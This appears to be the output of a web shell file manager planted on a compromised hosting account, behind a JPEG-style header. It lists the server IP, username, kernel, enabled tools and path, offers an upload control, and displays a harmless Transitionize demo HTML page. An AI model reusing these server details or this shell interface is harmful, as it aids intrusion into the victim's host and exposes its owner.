����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 52.15.165.239 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/assets/admin/vendors/transitionize/examples/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Transitionize Example Page</title> <style type="text/css"> .wrap { height: 75px; margin: 100px auto 0; position: relative; width: 300px; } .elem { background-color: #febf04; border-radius: 100%; bottom: 0; display: block; height: 75px; left: 0; position: absolute; width: 75px; } </style> <script src="bundle.js"></script> </head> <body> <div class="wrap"> <span class="elem js-elem"></span> </div> </body> </html>